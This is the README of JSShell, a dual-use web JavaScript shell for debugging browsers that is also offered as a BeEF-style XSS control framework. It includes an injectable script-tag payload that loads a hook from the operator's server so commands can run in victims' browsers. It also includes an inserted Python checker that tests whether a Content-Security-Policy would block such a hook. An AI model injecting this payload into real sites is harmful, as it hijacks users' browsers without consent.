
Den1al / Jsshell

Licence: MIT
An interactive multi-user web JS shell

JSShell 2.0

An interactive, multi-user, web-based JavaScript shell. It was initially created to debug remote esoteric browsers during experiments and research. This tool can easily be attached to an XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeEF framework).

Version 2.0 was created entirely from scratch, introducing exciting new features, stability and maintainability.

Version: 2.0

Author

Daniel Abeles.

Features

  • Multi client support
  • Cyclic DOM objects support
  • Pre flight scripts
  • Command Queue & Context
  • Extensible with Plugins
  • Injectable via <script> tags
  • Dumping command output to file
  • Shell pagination
  • HTTPS support!

Installation & Setup

Config File

In the resources directory, update the config.json file with your desired configuration:

  • Database host - if running with the docker deployment method, choose the database host as db (which is the internal host name).
  • Return URL - the URL which the requests will follow. The shell.js file does some AJAX calls to register and poll for new commands. Usually it will be http[s]://{YOUR_SERVER_IP}:{PORT}.
  • Startup script - a script that runs automatically when the JSShell CLI client is spawned.
  • Domain - if you desire to generate TLS certificates, this is the domain name the server will use.
  • It is also possible to point at a remote database if desired.

Let's Encrypt

JSShell now supports TLS, which means you can generate TLS certificates and feed them to the web server. The web server will infer the domain name from the config.json file. To create the certificate, use the create_cert.py script in the scripts folder:

$ cd scripts
$ python create_cert.py --domain <YOUR_DOMAIN> --email <YOUR_EMAIL>
The email field is optional.

Please note that the web server must be down in order for the script to function properly. At this point, we have successfully generated our certificates! The only modifications we need to make are:

  • In the config.json file, change the scheme of the URL field to https.
  • In the docker-compose.yml file change the exposed port of the web container to 443.

Docker

This new version supports installing and running JSShell via docker and docker-compose. Now, to install and run the entire JSShell framework, simply run:

$ ./scripts/start_docker_shell.sh

This will:

  • Start and create the database in the background
  • Start the web API server that handles incoming connections in the background
  • Spawn a new instance of the JSShell command line interface container

Regular

If you still want to use the old-fashioned method of installing, simply make sure you have a MongoDB database up and running, and update the config.json file residing in the resources directory.

I recommend using a virtual environment with pyenv:

$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv

Or using virtualenv:

$ virtualenv -p python3.6 venv
$ source venv/bin/activate

Then, install the requirements:

$ pip install -r requirements.txt

Running

If you used the docker method, there's no need to run the following procedure.

Web Server

Otherwise, once we have the database set up, we need to start the web API server. To do so, run:

$ python manage.py web

This will create and run a web server that listens to incoming connections and serves our JSShell code.

Shell

Now to start the JSShell CLI, run the same script but now with the shell flag:

$ python manage.py shell

Usage

After setup and running the required components, enter the help command to see the available commands:

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
    
>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>> 

Flow

JSShell supports 2 methods of operation:

  1. Injectable Shell (similar to the BeEF framework)
  2. Hosted Shell (for debugging)

Injectable Shell

Similar to other XSS control frameworks (like BeEF), JSShell is capable of managing successful XSS exploitations. For example, if you can inject a script tag, add the following resource to your payload, and a new client will appear in your console:

<script src="http[s]://{YOUR_SERVER_IP}:{PORT}/content/js"></script>
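A defender-side check for the injection described above, as an added example that is not part of the JSShell project: given a page's Content-Security-Policy header, it reports whether a cross-origin hook script like this one could load and whether its polling requests could reach the server. The hosts are constructed placeholders, and the matcher is a simplification that ignores source paths and 'strict-dynamic'.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}
# Constructed sample values: hosts are placeholders; /content/js is the path the README gives.
PAGE = "https://app.example.test/profile"
HOOK = "https://shell.attacker.test:5000/content/js"

def parse_csp(header):
    """Map each directive name to its source list (first occurrence wins)."""
    policy = {}
    for tokens in (part.lower().split() for part in header.split(";")):
        if tokens:
            policy.setdefault(tokens[0], tokens[1:])
    return policy

def origin(url):
    u = urlsplit(url)
    scheme = u.scheme.lower()
    return scheme, (u.hostname or "").lower(), u.port or DEFAULT_PORTS.get(scheme)

def source_matches(src, url, page_url):
    scheme, host, port = origin(url)
    if src == "'self'":
        return origin(url) == origin(page_url)
    if src == "*":
        return scheme in DEFAULT_PORTS
    if src.startswith("'"):      # 'none', nonces, hashes, 'unsafe-inline':
        return False             # an injected tag carries no valid nonce
    if src.endswith(":"):        # scheme-source such as "https:"
        return scheme == src[:-1]
    src_scheme, _, rest = src.rpartition("://")
    src_host, _, src_port = rest.split("/", 1)[0].partition(":")
    want = src_scheme or origin(page_url)[0]   # no scheme: inherit the page's
    host_ok = host.endswith(src_host[1:]) if src_host.startswith("*.") else host == src_host
    if not host_ok or (scheme != want and (want, scheme) != ("http", "https")):
        return False
    return src_port == "*" or port == (int(src_port) if src_port else DEFAULT_PORTS.get(scheme))

def allows(policy, directives, url, page_url):
    for name in directives:      # the first directive present governs the load
        if name in policy:
            return any(source_matches(s, url, page_url) for s in policy[name])
    return True                  # nothing applicable: CSP does not restrict it

def hook_exposure(csp_header, page_url, hook_url):
    policy = parse_csp(csp_header)
    script = allows(policy, ["script-src-elem", "script-src", "default-src"], hook_url, page_url)
    poll = allows(policy, ["connect-src", "default-src"], hook_url, page_url)
    return {"script_load": script, "polling": poll}
```

A result of `script_load: True` means the policy would not stop the tag from loading; `polling: False` means the policy would still block the AJAX calls to the shell server.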

Hosted Shell

If you desire to debug exotic and esoteric browsers, you can simply navigate to http[s]://{YOUR_SERVER_IP}:{PORT}/ and a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.

Credits

Canop for JSON.prune

use it at your own responsibility and risk.